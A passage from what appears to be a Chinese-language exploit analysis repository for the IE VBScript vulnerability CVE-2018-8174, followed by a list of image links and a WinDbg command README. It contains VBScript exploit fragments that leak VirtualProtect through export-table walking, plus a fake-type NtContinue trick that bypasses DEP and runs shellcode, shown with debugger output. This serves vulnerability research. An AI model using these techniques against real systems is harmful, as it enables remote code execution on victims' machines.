731 | 0:004> dd vbscript+00001000       _IMAGE_IMPORT_DESCRIPTOR结构中偏移0x14指向IAT中导出函数
732 | 6ae61000  75f50d4d 75f4a5b8 75f4f95f 75f4ecf8
733 | 6ae61010  75f511e5 75f49ba1 75f4fab0 75f4ad52
734 | 6ae61020  75f4dbe0 75f5141b 75f4d9da 75f9e091
735 | 6ae61030  75f4f7fa 75f49e3a 75f50b89 75f4bfd9
736 | 6ae61040  75f4dbae 75f4f574 75f4e344 75f5012e
737 | 6ae61050  75f509e4 75f54b72 75fa6ea9 75f651da
738 | 6ae61060  75f4edef 75f4aa61 75f4c24b 75f49e5a
739 | 6ae61070  75f4b0c9 75f4fbab 75f4ff45 75f57551
740 | ```
741 | 
742 | 
743 | 3. 如何Leak VirturalProtect 地址，为bypass dep做准备？
744 | ```
745 | Function IllIIl(lIII)
746 |     IllIIl=GetUint32(lIII) And (131071-65536)
747 | End Function
748 | 
749 | Function GetProcAddr(dll_base,name)
750 |     Dim p,export_dir,index
751 |     Dim function_rvas,function_names,function_ordin
752 |     Dim Illlll
753 |     p=GetUint32(dll_base+&h3c)     'PE头RVA
754 |     p=GetUint32(dll_base+p+&h78)   '导出表RVA
755 |     export_dir=dll_base+p
756 |  
757 |     function_rvas=dll_base+GetUint32(export_dir+&h1c)  '导出函数地址表RVA
758 |     function_names=dll_base+GetUint32(export_dir+&h20)  '导出函数名称表RVA
759 |     function_ordin=dll_base+GetUint32(export_dir+&h24)  '导出函数序号表RVA
760 |     index=0
761 |     Do While True            '遍历函数名称表，找到对应函数index
762 |         Dim lllI
763 |         lllI=GetUint32(function_names+index*4)
764 |         If StrCompWrapper(dll_base+lllI,name)=0 Then
765 |             Exit Do
766 |         End If
767 |         index=index+1
768 |     Loop
769 |     Illlll=IllIIl(function_ordin+index*2)    '根据index，在导出序号表中查找函数地址序号，作为下一步查找函数地址表的索引
770 |     p=GetUint32(function_rvas+Illlll*4)      '有了序号，即可定位函数地址RVA
771 |     GetProcAddr=dll_base+p
772 | End Function
773 | 
774 | VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect")
775 | ```
776 | 
777 | 导出表相对PE header的偏移为0x78，它的内部结构了解一下：
778 | 
779 | ```
780 | 导出表0x28字节
781 | 
782 | typedef struct _IMAGE_EXPORT_DIRECTORY {
783 |     DWORD   Characteristics;    //未使用
784 |     DWORD   TimeDateStamp;      //时间戳
785 |     WORD    MajorVersion;       //未使用
786 |     WORD    MinorVersion;       //未使用
787 |     DWORD   Name;               //指向该导出表文件名字符串
788 |     DWORD   Base;               //导出表的起始序号
789 |     DWORD   NumberOfFunctions;  //导出函数的个数(更准确来说是AddressOfFunctions的元素数，而不是函数个数) 
790 |     DWORD   NumberOfNames;      //以函数名字导出的函数个数
791 |     DWORD   AddressOfFunctions;     //偏移0x1c, 导出函数地址表RVA:存储所有导出函数地址(表元素宽度为4，总大小NumberOfFunctions * 4)
792 |     DWORD   AddressOfNames;         //偏移0x20, 导出函数名称表RVA:存储函数名字符串所在的地址(表元素宽度为4，总大小为NumberOfNames * 4)
793 |     DWORD   AddressOfNameOrdinals;  //偏移0x24, 导出函数序号表RVA:存储函数序号(表元素宽度为2，总大小为NumberOfNames * 2)
794 | } IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;
795 | 
796 | 地址表可能大于等于名字表，也有可能小于名字表，因为一个函数可能没有名字，也可能有多个名字。
797 | 但是一般情况下，名字表均不会大于地址表。并且一个函数必然有地址，不一定有名字，名字表和序号表一一对应。
798 | ```
799 | 
800 | 重点关注_IMAGE_EXPORT_DIRECTORY 最后三个Address，它们的关系如下所示
801 | ![](CVE-2018-8174/[VulnerabilityExploit]BypassALSR12.png)
802 | 
803 | windbg调试过程如下：
804 | ![](CVE-2018-8174/[VulnerabilityExploit]BypassALSR9.png)
805 | ![](CVE-2018-8174/[VulnerabilityExploit]BypassALSR10.png)
806 | ![](CVE-2018-8174/[VulnerabilityExploit]BypassALSR11.png)
807 | 
808 | 
809 | 
810 | # bypass DEP with NtContinue
811 | 参考：
812 | https://www.blackhat.com/docs/us-14/materials/us-14-Yu-Write-Once-Pwn-Anywhere.pdf
813 | https://www.youtube.com/watch?v=_z647GBTSlk
814 | 
815 | 
816 | 调试分析Leak基址后如何控制EIP, 执行shellcode
817 | 
818 | 1. 执行shellcode前，有几个关键地址，我们先记下来
819 | ```
820 | shellcode address:  054e002c     
821 | spec_int_1  002a68b4  
822 | 
823 | Addr_wrap_sh_with_ntcontinue
824 | 0:005> dd 050d1000  
825 | 050d1000  054e002c 054e002c 00003000 00000040
826 | 050d1010  054e0024 42424242 42424242 42424242
827 | 050d1020  68000000 6877a055 6877a055 6877a055
828 | 050d1030  0077a055 41414141 41414141 41414141
829 | 050d1040  41414141 41414141 41414141 41414141
830 | 050d1050  41414141 41414141 41414141 41414141
831 | 050d1060  41414141 41414141 41414141 41414141
832 | 050d1070  41414141 41414141 41414141 41414141
833 | 
834 | Addr_expand_with_virtualprotect
835 | 0:005> dd 002e2f64 
836 | 002e2f64  050d1023 00410041 00410041 00410041
837 | 002e2f74  00410041 00410041 00410041 00410041
838 | 002e2f84  00410041 00410041 00410041 00410041
839 | 002e2f94  00410041 00410041 00410041 00410041
840 | 002e2fa4  00410041 00410041 00410041 00410041
841 | 002e2fb4  00410041 00410041 00410041 00410041
842 | 002e2fc4  00410041 00410041 00410041 00410041
843 | 002e2fd4  00410041 00410041 00410041 00410041
844 | 
845 | ```
846 | 
847 | 2. 开始分析ExecuteShellcode 函数
848 | ```
849 | Sub ExecuteShellcode
850 |     cla4_obj1.mem(spec_int_1)=&h4d 'DEP bypass
851 |     IsEmpty("set fake type 4d")
852 |     
853 |     cla4_obj1.mem(spec_int_1+8)=0  '触发shellcode
854 |     msgbox(spec_int_1)        'VT replaced
855 | End Sub
856 | ```
857 | 
858 | cla4_obj1.mem(spec_int_1)=&h4d，则直接改变了cla4_obj1.mem(spec_int_1+8)的类型字段
859 | 
860 | ![](CVE-2018-8174/[VulnerabilityExploit]BypassDEP0.png)
861 | 
862 | ![](CVE-2018-8174/[VulnerabilityExploit]BypassDEP1.png)
863 | 
864 | cla4_obj1.mem(spec_int_1+8)出存放的是Addr_expand_with_virtualprotect
865 | 
866 | cla4_obj1.mem(spec_int_1+8) = 0, 则会释放cla4_obj1.mem(spec_int_1+8)对象
867 | 
868 | ![](CVE-2018-8174/[VulnerabilityExploit]BypassDEP2.png)
869 | 
870 | 3. 为什么fake type是0x4d? 为什么能成功call NtContinue?
871 | ```
872 | 0:005> ba e1 77a05568  -> 对NtContinue设断点
873 | ```
874 | ![](CVE-2018-8174/[VulnerabilityExploit]BypassDEP3.png)
875 | 
876 | 回到调用之前，对Var::Clear 设断点，深入分析
877 | ![](CVE-2018-8174/[VulnerabilityExploit]BypassDEP4.png)
878 | 
879 | ![](CVE-2018-8174/[VulnerabilityExploit]BypassDEP5.png)
880 | 
881 | 4. Call NtContinue的目的是？
882 | 
883 | 普及一下NtContinue 函数
884 | ```
885 | 
886 | NtContinue(
887 |   IN PCONTEXT             ThreadContext,
888 |   IN BOOLEAN              RaiseAlert );
889 | You can use NtContinue after processing exception for continue executing thread. 
890 | 
891 | typedef struct _CONTEXT
892 | {
893 |      ULONG ContextFlags;
894 |      ULONG Dr0;
895 |      ULONG Dr1;
896 |      ULONG Dr2;
897 |      ULONG Dr3;
898 |      ULONG Dr6;
899 |      ULONG Dr7;
900 |      FLOATING_SAVE_AREA FloatSave; 
901 |      ULONG SegGs;
902 |      ULONG SegFs;
903 |      ULONG SegEs;
904 |      ULONG SegDs;
905 |      ULONG Edi;
906 |      ULONG Esi;
907 |      ULONG Ebx;
908 |      ULONG Edx;
909 |      ULONG Ecx;
910 |      ULONG Eax;
911 |      ULONG Ebp;
912 |      ULONG Eip;     --> EIP，偏移B8字节
913 |      ULONG SegCs;
914 |      ULONG EFlags;
915 |      ULONG Esp;     --> ESP，偏移C4字节
916 |      ULONG SegSs;
917 |      UCHAR ExtendedRegisters[512];
918 | } CONTEXT, *PCONTEXT;
919 | 
920 | 
921 | ```
922 | 
923 | 简单来说，使用NtContinue可以让程序回到第一个参数指定的线程上下文中。
924 | ![](CVE-2018-8174/[VulnerabilityExploit]BypassDEP6.png)
925 | 
926 | ![](CVE-2018-8174/[VulnerabilityExploit]BypassDEP7.png)
927 | 
928 | ```
929 | 0:005> !address 054e002c
930 | Failed to map Heaps (error 80004005)
931 | Usage:                  <unclassified>
932 | Allocation Base:        054e0000
933 | Base Address:           054e0000
934 | End Address:            05561000
935 | Region Size:            00081000
936 | Type:                   00020000    MEM_PRIVATE
937 | State:                  00001000    MEM_COMMIT
938 | Protect:                00000004    PAGE_READWRITE
939 | 
940 | 0:005> !address 054e002c                   
941 | Failed to map Heaps (error 80004005)
942 | Usage:                  <unclassified>
943 | Allocation Base:        054e0000
944 | Base Address:           054e0000
945 | End Address:            054e4000
946 | Region Size:            00004000
947 | Type:                   00020000    MEM_PRIVATE
948 | State:                  00001000    MEM_COMMIT
949 | Protect:                00000040    PAGE_EXECUTE_READWRITE
950 | ```
951 | 
952 | ![](CVE-2018-8174/[VulnerabilityExploit]BypassDEP8.png)
953 | 
954 | ![](CVE-2018-8174/[VulnerabilityExploit]BypassDEP9.png)
955 | 


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-81740.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-81740.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-81741.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-81741.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-817410.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-817410.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-817411.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-817411.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-817412.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-817412.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-817413.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-817413.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-817414.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-817414.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-817415.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-817415.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-817416.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-817416.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-817417.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-817417.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-817418.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-817418.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-817419.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-817419.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-81742.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-81742.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-817420.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-817420.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-817421.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-817421.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-817422.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-817422.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-817423.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-817423.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-817424.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-817424.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-817425.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-817425.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-817426.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-817426.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-817427.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-817427.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-817428.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-817428.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-817429.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-817429.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-81743.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-81743.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-81744.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-81744.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-81745.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-81745.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-81746.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-81746.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-81747.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-81747.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-81748.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-81748.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/CVE-2018-81749.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/CVE-2018-81749.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassALSR0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassALSR0.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassALSR1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassALSR1.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassALSR10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassALSR10.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassALSR11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassALSR11.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassALSR12.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassALSR12.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassALSR2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassALSR2.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassALSR3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassALSR3.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassALSR4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassALSR4.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassALSR5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassALSR5.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassALSR6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassALSR6.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassALSR7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassALSR7.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassALSR9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassALSR9.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassDEP0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassDEP0.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassDEP1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassDEP1.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassDEP2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassDEP2.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassDEP3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassDEP3.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassDEP4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassDEP4.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassDEP5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassDEP5.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassDEP6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassDEP6.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassDEP7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassDEP7.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassDEP8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassDEP8.png


--------------------------------------------------------------------------------
/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassDEP9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/BrowserSecurity/CVE-2018-8174/[VulnerabilityExploit]BypassDEP9.png


--------------------------------------------------------------------------------
/BrowserSecurity/README.md:
--------------------------------------------------------------------------------
  1 | # 常用Windbg 命令
  2 | * bu vbscript!VbsIsEmpty ".printf \"VbsIsEmpty Output:\\n\"; .if(wo(poi(esp+c))== 8) {du poi((poi(esp+c)+8))} .else {dd poi(esp+c)}"
  3 | * bu vbscript!CScriptRuntime::RunNoEH "!py C:\\tools\\kl_vbs_disasm_windbg.py"
  4 | * bu jscript9!Js::Math::Atan ".printf \"DEBUG: %mu\\n\", poi(poi(esp+10)+c);g"
  5 | * bu jscript9!Js::Math::Atan2 ".printf \"DEBUG: %mu\\n\", poi(poi(esp+14)+c);"
  6 | * Flash调试， js 帮助函数
  7 | ```
  8 | <script>
  9 |     function debug_stop(text){
 10 |         Math.atan2(0xbadc0de, text);
 11 |     }
 12 |     
 13 |     function debug_continue(text){
 14 |         Math.atan(text);
 15 |     }
 16 | </script>
 17 | ```
 18 | 
 19 | * df xxx L1
 20 | * dD xxx L1
 21 | * !address addr
 22 | * !heap -p -a addr
 23 | * !heap -flt s 7ffe0  查看大小为7ffe0的内存，在堆喷的时候可以方便的找到payload所在的地址
 24 | * s -d 0 L?80000000 fffffffe 5570000 41414141 00000000  (64位寻址空间0x000'00000000 至 0x7FF'FFFFFFFF)
 25 | * s -a 0 L?80000000 "tags"
 26 | * s -u 
 27 | 
 28 | 
 29 | 
 30 | # IE JavaScript
 31 | ## DOM(IE10)
 32 | - https://www.jianshu.com/p/3d8a4ba86bbe
 33 | - https://www.jianshu.com/p/8cd37ffe9a98
 34 | - https://www.cnblogs.com/Ox9A82/p/5782425.html
 35 | 
 36 | 
 37 | ```
 38 | <html>
 39 |   <body>
 40 |     <script>
 41 |         alert("111");
 42 |     </script>
 43 |   </body>
 44 |   
 45 | </html>
 46 | ```
 47 | 
 48 | ```
 49 | bu MSHTML!CMarkup::CMarkup "gu; .printf \"New CMarkup Object: %p\\n\",eax ;"
 50 | bu MSHTML!CMarkup::~CMarkup ".printf \"Release CMarkup Object: %p\\n\",ecx; gu;"
 51 | bu MSHTML!CreateElement+0x64 "ln eax; gu; .printf \"Element Address: %p\\n\",poi(ebp-4); "
 52 | ```
 53 | 
 54 | 可以看到Dom节点的建立过程，每个tag对应一个Element对象，而CMarkup相当于一个容器，管理着它负责的这个Dom流
 55 | 
 56 | ```
 57 | 0:018> g
 58 | New CMarkup Object: 0b4bccc0
 59 | eax=0b4bccc0 ebx=04acbe68 ecx=0b212fe8 edx=01e2f2ec esi=0b4bccc0 edi=070a0fc0
 60 | eip=6afe382b esp=04acbcc0 ebp=04acbe48 iopl=0         nv up ei pl zr na pe nc
 61 | cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
 62 | MSHTML!CDoc::CreateMarkupFromInfo+0x192:
 63 | 6afe382b 8bd8            mov     ebx,eax
 64 | 0:007> g
 65 | (6afe98ec)   MSHTML!CHtmlElement::CreateElement   |  (6afe99c0)   MSHTML!CHtmlElement::`vftable'
 66 | Exact matches:
 67 |     MSHTML!CHtmlElement::CreateElement = <no type information>
 68 | Element Address: 0bc1ffc8
 69 | eax=00000000 ebx=0bb33f00 ecx=0bb33f00 edx=04acc150 esi=0bb33f00 edi=0bd14cf8
 70 | eip=6b032b29 esp=04acc1a4 ebp=04acc1bc iopl=0         nv up ei pl zr na pe nc
 71 | cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
 72 | MSHTML!CHtml5TreeConstructor::InsertAnHTMLElement+0x48:
 73 | 6b032b29 8b75fc          mov     esi,dword ptr [ebp-4] ss:0023:04acc1b8=0bc1ffc8
 74 | 0:007> g
